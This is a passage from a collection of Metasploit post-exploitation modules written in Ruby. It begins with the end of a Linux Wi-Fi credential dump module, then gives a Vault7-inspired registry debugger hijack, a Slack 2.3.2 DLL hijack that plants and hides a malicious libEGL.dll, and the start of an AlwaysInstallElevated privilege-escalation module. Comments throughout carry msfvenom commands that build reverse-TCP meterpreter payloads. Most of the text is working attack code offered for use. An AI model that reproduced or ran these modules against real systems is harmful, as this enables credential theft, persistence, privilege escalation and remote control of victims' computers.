196 | Rex::sleep(0.5)
197 |
198 | #
199 | # Display remote ESSIDs available ..
200 | #
201 | if datastore['ESSID_DUMP'] == true
202 | # Store interface in use (remote)
203 | interface = cmd_exec("netstat -r | grep default | awk {'print $8'}")
204 | # Executing interface scan (essids emitting) nmcli dev wifi list
205 | current_essid = cmd_exec("iw dev #{interface} scan | grep \"SSID\" | head -1 | awk {'print $2'}")
206 | essid_out = cmd_exec("nmcli dev wifi list")
207 | print_line("Current SSID: #{current_essid}")
208 | print_line("ESSIDs EMITING SIGNAL:")
209 | print_line("----------------------")
210 | print_line(essid_out)
211 | print_line("")
212 | Rex::sleep(0.5)
213 | # store dump into a variable
214 | # to write logfile if selected ..
215 | data_dump << essid_out
216 | end
217 |
218 | #
219 | # Store data to msf loot folder (local) ..
220 | #
221 | if datastore['STORE_LOOT'] == true
222 | print_warning("Credentials stored in: ~/.msf4/loot (folder) ..")
223 | store_loot("wpa_wep_credentials", "text/plain", session, data_dump, "wpa_wep_dump.txt", "output of wpa/wep dump")
224 | end
225 |
226 | #
227 | # error exception funtion
228 | #
229 | rescue ::Exception => e
230 | print_error("Error Running Command: #{e.class} #{e}")
231 | print_warning("Try to privilege escalation before runing this module ..")
232 | end
233 |
234 |
235 |
236 | #
237 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
238 | # Running sellected modules against session target
239 | #
240 | def run
241 | session = client
242 |
243 |
244 | # Variable declarations (msf API calls)
245 | sysnfo = session.sys.config.sysinfo
246 | runtor = client.sys.config.getuid
247 | runsession = client.session_host
248 | directory = client.fs.dir.pwd
249 |
250 |
251 | # Print banner and scan results on screen
252 | print_line("")
253 | print_line(" +--------------------------------------------+")
254 | print_line(" | * ESSID WIFI PASSWORD DUMP LINUX * |")
255 | print_line(" | Author : r00t-3xp10it |")
256 | print_line(" +--------------------------------------------+")
257 | print_line("")
258 | print_line(" Running on session : #{datastore['SESSION']}")
259 | print_line(" Target Architecture : #{sysnfo['Architecture']}")
260 | print_line(" Computer : #{sysnfo['Computer']}")
261 | print_line(" Target IP addr : #{runsession}")
262 | print_line(" Payload directory : #{directory}")
263 | print_line(" Operative System : #{sysnfo['OS']}")
264 | print_line(" Client UID : #{runtor}")
265 | print_line("")
266 | print_line("")
267 |
268 |
269 | #
270 | # the 'def check()' funtion that rapid7 requires to accept new modules.
271 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
272 | #
273 | # check for proper operative system (Linux)
274 | #
275 | unless sysinfo['OS'] =~ /Linux/ || sysinfo['OS'] =~ /linux/
276 | print_error("[ABORT]: This module only works againt Linux systems")
277 | return nil
278 | end
279 | #
280 | # Check if we are running in an higth integrity context (root)
281 | #
282 | unless runtor =~ /uid=0/ || runtor =~ /root/
283 | print_error("[ABORT]: Root access is required ..")
284 | return nil
285 | end
286 | #
287 | # check for proper session (meterpreter)
288 | # the non-return of sysinfo command reveals that we are not on a meterpreter session!
289 | #
290 | if not sysinfo.nil?
291 | print_status("Running module against: #{sysnfo['Computer']}")
292 | else
293 | print_error("[ABORT]: This module only works in meterpreter sessions!")
294 | return nil
295 | end
296 |
297 |
298 | #
299 | # Selected settings to run
300 | #
301 | if datastore['DUMP_CREDS']
302 | ls_stage1
303 | end
304 | end
305 | end
306 |
--------------------------------------------------------------------------------
/windows/hijack/Vault7_cia_debugger_hijack.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Vault7_cia_debugger_hijack.rb
11 | # $Id$ 1.2 Author: r00t-3xp10it | SSA RedTeam @2017
12 | # Credits: https://wikileaks.org/ciav7p1/cms/page_2621770.html
13 | #
14 | #
15 | # [ POST-EXPLOITATION MODULE DESCRIPTION ]
16 | # 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe'
17 | # This registry key can be used to redirect the execution of any application
18 | # to a different executable. The specified “debugger” application will be
19 | # called with a path to the original program as the first argument.
20 | #
21 | #
22 | # [ POST MODULE OPTIONS ]
23 | # The session number to run this module on => set SESSION 1
24 | # Application to be hijacked => set HIJACK notepad.exe
25 | # Full Path of the Binary to be executed => set EXEC C:\\Windows\\System32\\calc.exe
26 | # Delete registry hijack hive/keys? => set REVERT_HIJACK true
27 | # ---
28 | # HINT: we can upload an payload.exe to %temp% and execute it
29 | # meterpreter > upload /root/payload.exe %temp%\\payload.exe
30 | # and use 'set EXEC %temp%\\payload.exe' to start the uploaded binary.
31 | #
32 | #
33 | # [ PORT MODULE TO METASPLOIT DATABASE ]
34 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/manage/Vault7_cia_debugger_hijack.rb
35 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/manage/Vault7_cia_debugger_hijack.rb
36 | # Manually Path Search: root@kali:~# locate modules/post/windows/manage
37 | #
38 | #
39 | # [ LOAD/USE AUXILIARY ]
40 | # meterpreter > background
41 | # msf exploit(handler) > reload_all
42 | # msf exploit(handler) > use post/windows/manage/Vault7_cia_debugger_hijack
43 | # msf post(Vault7_cia_debugger_hijack) > info
44 | # msf post(Vault7_cia_debugger_hijack) > show options
45 | # msf post(Vault7_cia_debugger_hijack) > show advanced options
46 | # msf post(Vault7_cia_debugger_hijack) > set [option(s)]
47 | # msf post(Vault7_cia_debugger_hijack) > exploit
48 | ##
49 |
50 |
51 |
52 |
53 |
54 |
55 | # -----------------------------------
56 | # Module Dependencies
57 | # -----------------------------------
58 | require 'rex'
59 | require 'msf/core'
60 | require 'msf/core/post/common'
61 | require 'msf/core/post/windows/priv'
62 | require 'msf/core/post/windows/registry'
63 |
64 |
65 |
66 | # -------------------------------------
67 | # Metasploit Class name and libs
68 | # -------------------------------------
69 | class MetasploitModule < Msf::Post
70 | Rank = GoodRanking
71 |
72 | include Msf::Post::Common
73 | include Msf::Post::Windows::Priv
74 | include Msf::Post::Windows::Registry
75 |
76 |
77 |
78 |
79 | # -----------------------------------------
80 | # Building Metasploit/Armitage info GUI/CLI
81 | # -----------------------------------------
82 | def initialize(info={})
83 | super(update_info(info,
84 | 'Name' => 'Vault7_cia_debugger_hijack (reg hijack RCE)',
85 | 'Description' => %q{
86 |
87 | This registry key can be used to redirect the execution of any application to a different executable. The specified “debugger” application will be called with a path to the original program as the first argument.
88 |
89 | },
90 | 'License' => UNKNOWN_LICENSE,
91 | 'Author' =>
92 | [
93 | 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
94 | 'Inspiration: Chaitanya [ SSA RedTeam ]', # module inspiration
95 | 'Special thanks: Wikileaks Vault7 CIA leak' # CIA wikileaks public leak
96 | ],
97 |
98 | 'Version' => '$Revision: 1.2',
99 | 'DisclosureDate' => 'abr 19 2017',
100 | 'Platform' => 'windows',
101 | 'Arch' => 'x86_x64',
102 | 'Privileged' => 'true', # we need a priviliged session to hijack keys :(
103 | 'Targets' =>
104 | [
105 | # Tested againts windows 7 (SP1)
106 | [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
107 | ],
108 | 'DefaultTarget' => '3', # default its to run againts Windows 7
109 | 'References' =>
110 | [
111 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
112 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
113 | [ 'URL', 'https://wikileaks.org/ciav7p1/cms/page_2621770.html' ]
114 | ],
115 | 'DefaultOptions' =>
116 | {
117 | 'SESSION' => '1', # Default its to run againts session 1
118 | 'HIJACK' => 'notepad.exe', # default vulnerable appl to be hijack
119 | },
120 | 'SessionTypes' => [ 'meterpreter' ]
121 |
122 | ))
123 |
124 | register_options(
125 | [
126 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
127 | OptString.new('HIJACK', [ false, 'Application to be hijacked (eg. notepad.exe)']),
128 | OptString.new('EXEC', [ false, 'Full Path of the Binary to be executed (eg. %windir%\\system32\\calc.exe)'])
129 | ], self.class)
130 |
131 | register_advanced_options(
132 | [
133 | OptBool.new('REVERT_HIJACK', [ false, 'Delete registry hijacked hive/keys?' , false])
134 | ], self.class)
135 |
136 | end
137 |
138 |
139 |
140 |
141 |
142 | #
143 | # Hijack legit process to gain code execution
144 | #
145 | def hijack_funtion
146 |
147 | r=''
148 | session = client
149 | executable = datastore['EXEC']
150 | exec_hijack = datastore['HIJACK']
151 | reg_hive = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
152 | reg_make = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{exec_hijack}"
153 | #
154 | # Check if module options are rigth configurated ..
155 | #
156 | if datastore['HIJACK'] == 'nil' || datastore['EXEC'] == 'nil'
157 | print_error(" Options not configurated correctly ..")
158 | print_warning(" Please set HIJACK | EXEC options!")
159 | return nil
160 | else
161 | print_status("Hijacking #{exec_hijack} process!")
162 | Rex::sleep(1.5)
163 | end
164 |
165 | #
166 | # Start writing registry keys ..
167 | #
168 | print_warning(" Reading process registry hive keys ..")
169 | Rex::sleep(1.0)
170 | # Check if registry hive exists ..
171 | if registry_enumkeys("#{reg_hive}")
172 | print_good(" exec => remote registry hive found ..")
173 | Rex::sleep(1.0)
174 | print_good(" exec => Placing new registry key (hijack) ..")
175 | #
176 | # PLacing new registry hive/keys, And start hijacked application ..
177 | #
178 | r = session.sys.process.execute("cmd.exe /c REG ADD \"#{reg_make}\" /v Debugger /t REG_SZ /d #{executable} /f", nil, {'Hidden' => true, 'Channelized' => true})
179 | Rex::sleep(2.0)
180 | print_good(" exec => start #{exec_hijack} application ..")
181 | r = session.sys.process.execute("cmd.exe /c start \"#{exec_hijack}\"", nil, {'Hidden' => true, 'Channelized' => true})
182 | Rex::sleep(1.0)
183 | print_status("Hijack completed successefully ..")
184 | r.channel.close
185 | r.close
186 | else
187 | #
188 | # registry hive not found, aborting module execution ..
189 | #
190 | print_error("[ABORT]: Module cant find the registry hive needed ..")
191 | print_error("[HIVE] : #{reg_hive}")
192 | print_line("")
193 | Rex::sleep(1.0)
194 | return nil
195 | end
196 | end
197 |
198 |
199 |
200 |
201 | #
202 | # Revert process hijack in target regedit
203 | #
204 | def revert_hijack
205 |
206 | r=''
207 | session = client
208 | exec_hijack = datastore['HIJACK']
209 | reg_delete = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{exec_hijack}"
210 | #
211 | # Check if module options are rigth configurated ..
212 | #
213 | if datastore['HIJACK'] == 'nil' || datastore['REVERT_HIJACK'] == 'nil'
214 | print_error(" Options not configurated correctly ..")
215 | print_warning(" Please set REVERT_HIJACK | HIJACK options!")
216 | return nil
217 | else
218 | print_status("Deleting #{exec_hijack} hijacked reg hive ..")
219 | Rex::sleep(1.5)
220 | end
221 |
222 | #
223 | # Start deleting registry hive/keys ..
224 | #
225 | print_warning(" Reading process registry hive keys ..")
226 | Rex::sleep(1.0)
227 | if registry_enumkeys("#{reg_delete}")
228 | print_good(" exec => Remote registry hive key found ..")
229 | Rex::sleep(1.0)
230 | print_good(" exec => Deleting registry hive/keys ..")
231 | r = session.sys.process.execute("cmd.exe /c \"REG DELETE #{reg_delete}\" /f", nil, {'Hidden' => true, 'Channelized' => true})
232 | Rex::sleep(2.0)
233 | print_status("Registry Keys deleted successefully ..")
234 | r.channel.close
235 | r.close
236 | else
237 | #
238 | # registry hive key not found, aborting module execution.
239 | #
240 | print_error("[ABORT]: module cant find the registry hive key needed ..")
241 | print_error("[HIVE] : #{reg_delete}")
242 | print_line("")
243 | Rex::sleep(1.0)
244 | return nil
245 | end
246 | end
247 |
248 |
249 |
250 |
251 | # ------------------------------------------------
252 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
253 | # ------------------------------------------------
254 | def run
255 | session = client
256 |
257 |
258 | # Variable declarations (msf API calls)
259 | oscheck = client.fs.file.expand_path("%OS%")
260 | sysnfo = session.sys.config.sysinfo
261 | runtor = client.sys.config.getuid
262 | runsession = client.session_host
263 | directory = client.fs.dir.pwd
264 |
265 | # Print banner and scan results on screen
266 | print_line(" +-----------------------------------------+")
267 | print_line(" | * Vault7_CIA_debugger_hijack * |")
268 | print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |")
269 | print_line(" +-----------------------------------------+")
270 | print_line("")
271 | print_line(" Running on session : #{datastore['SESSION']}")
272 | print_line(" Computer : #{sysnfo['Computer']}")
273 | print_line(" Operative System : #{sysnfo['OS']}")
274 | print_line(" Target IP addr : #{runsession}")
275 | print_line(" Payload directory : #{directory}")
276 | print_line(" Client UID : #{runtor}")
277 | print_line("")
278 | print_line("")
279 |
280 |
281 | #
282 | # the 'def check()' funtion that rapid7 requires to accept new modules.
283 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
284 | #
285 | # check for proper operative system (windows-not-wine)
286 | if not oscheck == "Windows_NT"
287 | print_error("[ ABORT ]: This module only works againts windows systems")
288 | return nil
289 | end
290 | #
291 | # check if we are running againts a priviliged session
292 | #
293 | if not runtor == "NT AUTHORITY\\SYSTEM"
294 | print_error("[ ABORT ]: This module requires a priviliged session ..")
295 | print_warning("This module requires NT AUTHORITY\\SYSTEM privs to run")
296 | return nil
297 | end
298 | #
299 | # check for proper session (meterpreter) the non-return of sysinfo
300 | # command reveals that we are not on a meterpreter session ..
301 | #
302 | if not sysinfo.nil?
303 | print_status("Running module against: #{sysnfo['Computer']}")
304 | else
305 | print_error("[ ABORT ]: This module only works against meterpreter sessions!")
306 | return nil
307 | end
308 | # elevate session privileges befor runing options
309 | client.sys.config.getprivs.each do |priv|
310 | end
311 |
312 |
313 | # ------------------------
314 | # Selected settings to run
315 | # ------------------------
316 | if datastore['EXEC']
317 | hijack_funtion
318 | end
319 |
320 | if datastore['REVERT_HIJACK']
321 | revert_hijack
322 | end
323 | end
324 | end
325 |
--------------------------------------------------------------------------------
/windows/hijack/slack_dll_hijack.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : slack_dll_hijack.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Slack Version : 2.3.2
13 | # Vuln Discover : Chaitanya Haritash
14 | # Tested on : Windows 7 ultimate (32 bits)
15 | # Software Link : http://www.techspot.com/downloads/6754-slack.html
16 | #
17 | #
18 | # [ VULNERABILITY DETAILS ]
19 | # DLL Hijacking is when you abuse the library search order to gain execution in a process.
20 | # Being able to write to the directory an executable it allows a malicious actor the ability
21 | # to drop a dll with the same name as one the executable will request via LoadLibrary. When
22 | # executable attempts to load the expected library, it will instead load the malicious dll.
23 | # "In this case the current install directory and PATH environment (%LOCALAPPDATA%) are the
24 | # problems. When a program makes the decision to load a DLL from the current directory, it
25 | # can lead to DLL hijacking, in this example expoited remotelly"...
26 | #
27 | #
28 | #
29 | # [ BUILD MALICIOUS DLL FOR TESTING ]
30 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=1337 -a x86 --platform windows -f dll -o libEGL.dll
31 | #
32 | # [ MODULE DEFAULT OPTIONS ]
33 | # The session number to run this module on => set SESSION 3
34 | # The full path (local) of payload to be uploaded => set LOCAL_PATH /root/libEGL.dll
35 | # Revert libEGL.dll to is default stage? => set REVERT_HIJACK true
36 | #
37 | #
38 | # [ PORT MODULE TO METASPLOIT DATABASE ]
39 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/manage/slack_dll_hijack.rb
40 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/manage/slack_dll_hijack.rb
41 | # Manually Path Search: root@kali:~# locate modules/post/windows/manage
42 | #
43 | #
44 | # [ LOAD/USE AUXILIARY ]
45 | # meterpreter > background
46 | # msf exploit(handler) > reload_all
47 | # msf exploit(handler) > use post/windows/manage/slack_dll_hijack
48 | # msf post(slack_dll_hijack) > info
49 | # msf post(slack_dll_hijack) > show options
50 | # msf post(slack_dll_hijack) > show advanced options
51 | # msf post(slack_dll_hijack) > set [option(s)]
52 | # msf post(slack_dll_hijack) > exploit
53 | ##
54 |
55 |
56 |
57 |
58 | # ----------------------------
59 | # Module Dependencies/requires
60 | # ----------------------------
61 | require 'rex'
62 | require 'msf/core'
63 | require 'msf/core/post/common'
64 | require 'msf/core/post/windows/priv'
65 |
66 |
67 |
68 | # ----------------------------------
69 | # Metasploit Class name and includes
70 | # ----------------------------------
71 | class MetasploitModule < Msf::Post
72 | Rank = GreatRanking
73 |
74 | include Msf::Post::Common
75 | include Msf::Post::Windows::Priv
76 | include Msf::Post::Windows::Error
77 |
78 |
79 |
80 | # -----------------------------------------
81 | # Building Metasploit/Armitage info GUI/CLI
82 | # -----------------------------------------
83 | def initialize(info={})
84 | super(update_info(info,
85 | 'Name' => 'dll hijacking in slack 2.3.2 software',
86 | 'Description' => %q{
87 | This post-exploitation module requires a meterpreter session to be able to upload our malicious libEGL.dll agent into slack 2.3.2 working directory. When slack.exe attempts to load the expected library, it will instead load the malicious dll. "WARNING: payload to send must be named as: libEGL.dll"
88 | },
89 | 'License' => UNKNOWN_LICENSE,
90 | 'Author' =>
91 | [
92 | 'module author : pedr0 Ubuntu [r00t-3xp10it]', # post-module author
93 | 'Vuln discover : Chaitanya Haritash', # vuln discover
94 | ],
95 |
96 | 'Version' => '$Revision: 1.3',
97 | 'DisclosureDate' => 'dez 2 2016',
98 | 'Platform' => 'windows',
99 | 'Arch' => 'x86_x64',
100 | 'Privileged' => 'false', # thats no need for privilege escalation..
101 | 'Targets' =>
102 | [
103 | # tested on: windows 7 ultimate (32 bits)
104 | [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
105 | ],
106 | 'DefaultTarget' => '3', # default its to run againts windows 7
107 | 'References' =>
108 | [
109 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
110 | [ 'URL', 'http://www.techspot.com/downloads/6754-slack.html' ],
111 | [ 'URL', 'https://blog.fortinet.com/2015/12/10/a-crash-course-in-dll-hijacking' ]
112 | ],
113 | 'DefaultOptions' =>
114 | {
115 | 'SESSION' => '1', # Default its to run againts session 1
116 | },
117 | 'SessionTypes' => [ 'meterpreter' ]
118 |
119 | ))
120 |
121 | register_options(
122 | [
123 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
124 | OptString.new('LOCAL_PATH', [ false, 'The full path of libEGL.dll to upload (eg /root/libEGL.dll)'])
125 | ], self.class)
126 |
127 | register_advanced_options(
128 | [
129 | OptBool.new('REVERT_HIJACK', [ false, 'Revert lbEGL.dll to default stage?' , false])
130 | ], self.class)
131 |
132 | end
133 |
134 |
135 |
136 |
137 | # --------------------------------------------
138 | # UPLOAD OUR MALICIOUS DLL INTO TARGET SYSYTEM
139 | # --------------------------------------------
140 | def ls_stage1
141 |
142 | r=''
143 | session = client
144 | s_name = "slack.exe" # service executable
145 | p_name = "libEGL.dll" # malicious libEGL.dll
146 | u_path = datastore['LOCAL_PATH'] # /root/libEGL.dll
147 | d_path = "%LOCALAPPDATA%\\slack\\app-2.3.2" # remote path on target system (slack software)
148 | # check for proper config settings enter
149 | # to prevent 'unset all' from deleting default options...
150 | if datastore['LOCAL_PATH'].blank?
151 | print_error("Options not configurated correctly...")
152 | print_warning("Please set LOCAL_PATH option!")
153 | return nil
154 | else
155 | print_status("Exploiting dll hijacking in slack 2.3.2!")
156 | sleep(1.5)
157 | end
158 |
159 | # check if original libEGL.dll exist in target
160 | if client.fs.file.exist?("#{d_path}\\#{p_name}")
161 | print_warning("Vulnerable dll agent: #{p_name} found...")
162 | # backup original dll using cmd.exe COPY command...
163 | print_good(" Backup original slack software dll...")
164 | r = session.sys.process.execute("cmd.exe /c COPY /Y #{d_path}\\#{p_name} #{d_path}\\libEGL.bk", nil, {'Hidden' => true, 'Channelized' => true})
165 | sleep(1.0)
166 |
167 | # upload our malicious libEGL.dll into target system..
168 | print_good(" Uploading: #{p_name} malicious agent...")
169 | client.fs.file.upload("#{d_path}\\#{p_name}","#{u_path}")
170 | sleep(1.0)
171 | print_good(" Uploaded : #{d_path}\\#{p_name}")
172 | sleep(1.0)
173 |
174 | # change attributes of libEGL.dll to hidde it from site...
175 | print_good(" Use attrib command to hidde malicious dll...")
176 | r = session.sys.process.execute("cmd.exe /c attrib +h +s #{d_path}\\#{p_name}", nil, {'Hidden' => true, 'Channelized' => true})
177 | print_good(" attrib +h +s #{d_path}\\#{p_name}")
178 | sleep(1.0)
179 |
180 | # start remote malicious service
181 | print_status("Start slack 2.3.2 service remotelly...")
182 | r = session.sys.process.execute("cmd.exe /c start #{s_name}", nil, {'Hidden' => true, 'Channelized' => true})
183 | sleep(1.5)
184 |
185 | # task completed successefully...
186 | print_status("Malicious dll placed successefuly...")
187 | print_status("If you have set a handler befor... congratz!")
188 | print_line("")
189 |
190 | # close channel when done
191 | r.channel.close
192 | r.close
193 |
194 | else
195 | print_error("[ ABORT ]: post-module cant find original dll...")
196 | print_error("slack_dll: #{d_path}\\#{p_name}")
197 | print_line("")
198 | end
199 |
200 | # error exception funtion
201 | rescue ::Exception => e
202 | print_error("Error: #{e.class} #{e}")
203 | end
204 |
205 |
206 |
207 |
208 | # --------------------------------------
209 | # REVERT MALICIOUS DLL TO ORIGINAL STATE
210 | # --------------------------------------
211 | def ls_stage2
212 |
213 | r=''
214 | session = client
215 | p_name = "libEGL.dll" # malicious libEGL.dll
216 | b_name = "libEGL.bk" # libEGL.dll remote backup
217 | d_path = "%LOCALAPPDATA%\\slack\\app-2.3.2" # remote path on target system (slack software)
218 | # check for proper config settings enter
219 | # to prevent 'unset all' from deleting default options...
220 | if datastore['REVERT_HIJACK'].blank?
221 | print_error("Options not configurated correctly...")
222 | print_warning("Please set REVERT_HIJACK option!")
223 | return nil
224 | else
225 | print_status("Detecting remote malicious dll.")
226 | sleep(1.5)
227 | end
228 |
229 | # check if backup exist in target
230 | if client.fs.file.exist?("#{d_path}\\#{b_name}")
231 | print_warning(" Backup dll agent: #{b_name} found...")
232 |
233 | # change attributes of libEGL.dll to un-hidde it...
234 | print_good(" Use attrib command to un-hidde dll...")
235 | r = session.sys.process.execute("cmd.exe /c attrib -h -s #{d_path}\\#{p_name}", nil, {'Hidden' => true, 'Channelized' => true})
236 |
237 | # revert original dll...
238 | print_good(" Revert slack dll to default stage...")
239 | r = session.sys.process.execute("cmd.exe /c MOVE /Y #{d_path}\\#{b_name} #{d_path}\\#{p_name}", nil, {'Hidden' => true, 'Channelized' => true})
240 | sleep(1.0)
241 | print_status("dll hijacking in slack 2.3.2 reverted...")
242 | print_warning("we have lost our shell, but feeded the white hacker within...")
243 | print_line("")
244 |
245 | # close channel when done
246 | r.channel.close
247 | r.close
248 |
249 | else
250 | print_error("[ ABORT ]: post-module cant find backup dll...")
251 | print_error("backup_dll: #{d_path}\\#{b_name}")
252 | print_line("")
253 | end
254 |
255 | # error exception funtion
256 | rescue ::Exception => e
257 | print_error("Error: #{e.class} #{e}")
258 | end
259 |
260 |
261 |
262 |
263 | # ------------------------------------------------
264 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
265 | # Running sellected modules against session target
266 | # ------------------------------------------------
267 | def run
268 | session = client
269 |
270 | # Variable declarations (msf API calls)
271 | sysnfo = session.sys.config.sysinfo
272 | runtor = client.sys.config.getuid
273 | runsession = client.session_host
274 | directory = client.fs.dir.pwd
275 |
276 |
277 | # Print banner and scan results on screen
278 | print_line(" +----------------------------------------------+")
279 | print_line(" | slack v2.3.2 - DLL hijacking |")
280 | print_line(" | Author: r00t-3xp10it - Chaitanya |")
281 | print_line(" +----------------------------------------------+")
282 | print_line("")
283 | print_line(" Running on session : #{datastore['SESSION']}")
284 | print_line(" Computer : #{sysnfo['Computer']}")
285 | print_line(" Operative System : #{sysnfo['OS']}")
286 | print_line(" Target IP addr : #{runsession}")
287 | print_line(" Payload directory : #{directory}")
288 | print_line(" Client UID : #{runtor}")
289 | print_line("")
290 | print_line("")
291 |
292 |
293 | # check for proper session.
294 | if not sysinfo.nil?
295 | print_status("Running module against: #{sysnfo['Computer']}")
296 | else
297 | print_error("[ ABORT ]:This post-module only works in meterpreter sessions")
298 | raise Rex::Script::Completed
299 | end
300 | # elevate session privileges befor runing options
301 | client.sys.config.getprivs.each do |priv|
302 | end
303 |
304 |
305 | # ------------------------------------
306 | # Selected settings to run
307 | # ------------------------------------
308 | if datastore['LOCAL_PATH']
309 | ls_stage1
310 | end
311 |
312 | if datastore['REVERT_HIJACK']
313 | ls_stage2
314 | end
315 | end
316 | end
317 |
--------------------------------------------------------------------------------
/windows/local-privilege-escalation/MSI_privilege_escalation.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # MSI Install Privilege Escalation (registry).
11 | # $Id$ 1.3 Author: r00t-3xp10it | SSA RedTeam @2016
12 | # 'next time target machine restarts it will let us install .msi files as @SYSTEM'
13 | # Credits: http://toshellandback.com/2015/11/24/ms-priv-esc/
14 | #
15 | #
16 | # [ POST-EXPLOITATION MODULE DESCRIPTION ]
17 | # This post-module checks for 'AlwaysInstallElevated' registry key settings in target machine and
18 | # adds the requiered keys if they are not set/present. 'AlwaysInstallElevated' is a setting that
19 | # allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI)
20 | # with elevated (SYSTEM) permissions. 'REMARK: All changes will be active on next reboot.'
21 | #
22 | #
23 | # [ MODULE OPTIONS ]
24 | # The session number to run this module on => set SESSION 1
25 | # Elevate session to 'nt authority/system' => set GET_SYSTEM true
26 | # Check/Elevate MSI files install permissions => set MSI_ESCALATION true
27 | # Revert MSI install permissions to dword:0 => set REVERT_PRIVS true
28 | #
29 | #
30 | # [ PORT MODULE TO METASPLOIT DATABASE ]
31 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/MSI_privilege_escalation.rb
32 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/MSI_privilege_escalation.rb
33 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
34 | #
35 | #
36 | # [ BUILD MSI PAYLOAD ]
37 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=666 --platform windows -f msi-nouac -o priv_escal.msi
38 | #
39 | # [ EXECUTE MSI PAYLOAD 'cmd terminal' ]
40 | # msiexec /quiet /qn /i priv_escal.msi
41 | #
42 | #
43 | # [ LOAD/USE AUXILIARY ]
44 | # meterpreter > background
45 | # msf exploit(handler) > reload_all
46 | # msf exploit(handler) > use post/windows/escalate/MSI_privilege_escalation
47 | # msf post(MSI_privilege_escalation) > info
48 | # msf post(MSI_privilege_escalation) > show options
49 | # msf post(MSI_privilege_escalation) > show advanced options
50 | # msf post(MSI_privilege_escalation) > set [option(s)]
51 | # msf post(MSI_privilege_escalation) > exploit
52 | ##
53 |
54 |
55 |
56 |
57 |
58 |
59 | # -----------------------------------
60 | # Module Dependencies
61 | # -----------------------------------
62 | require 'rex'
63 | require 'msf/core'
64 | require 'msf/core/post/common'
65 | require 'msf/core/post/windows/priv'
66 | require 'msf/core/post/windows/registry'
67 |
68 |
69 |
70 | # -------------------------------------
71 | # Metasploit Class name and libs
72 | # -------------------------------------
73 | class MetasploitModule < Msf::Post
74 | Rank = GoodRanking
75 |
76 | include Msf::Post::Common
77 | include Msf::Post::Windows::Priv
78 | include Msf::Post::Windows::Registry
79 |
80 |
81 |
82 | # -----------------------------------------
83 | # Building Metasploit/Armitage info GUI/CLI
84 | # -----------------------------------------
85 | def initialize(info={})
86 | super(update_info(info,
87 | 'Name' => 'MSI Install Privilege Escalation',
88 | 'Description' => %q{
89 |
90 | This post-module checks for 'AlwaysInstallElevated' registry key settings in target machine and adds the requiered keys if they are not set/present. 'AlwaysInstallElevated' is a setting that allows non privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. 'REMARK: All changes will be active on next reboot.'
91 |
92 | },
93 | 'License' => UNKNOWN_LICENSE,
94 | 'Author' =>
95 | [
96 | 'peterubuntu10[at]sourceforge[dot]net', # post-module author
97 | 'inspiration: Ben Campbell | Parvez Anwar', # inspiration
98 | 'bug hunter : Chaitanya [SSA RedTeam]' # module debug
99 |
100 | ],
101 |
102 | 'Version' => '$Revision: 1.3',
103 | 'DisclosureDate' => 'ago 22 2016',
104 | 'Platform' => 'windows',
105 | 'Arch' => 'x86_x64',
106 | 'Privileged' => 'false',
107 | 'Targets' =>
108 | [
109 | # Tested againts windows XP (SP3) | windows 7
110 | [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
111 | ],
112 | 'DefaultTarget' => '1', # default its to run againts windows XP
113 | 'References' =>
114 | [
115 | [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
116 | [ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],
117 | [ 'URL', 'https://support.microsoft.com/en-us/kb/227181' ],
118 | [ 'URL', 'http://toshellandback.com/2015/11/24/ms-priv-esc/' ],
119 | [ 'URL', 'http://sourceforge.net/projects/msf-auxiliarys/repository' ],
